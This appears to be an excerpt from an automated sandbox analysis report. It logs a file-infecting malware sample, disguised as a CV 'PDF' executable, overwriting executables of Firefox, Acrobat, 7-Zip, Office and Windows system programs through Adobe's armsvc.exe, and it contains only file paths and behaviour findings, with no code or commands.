            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Infects executable files (exe, dll, sys, html)
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: \cv_sales representative - job request pdf.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: \cv_sales representative - job request pdf.exeJump to behavior
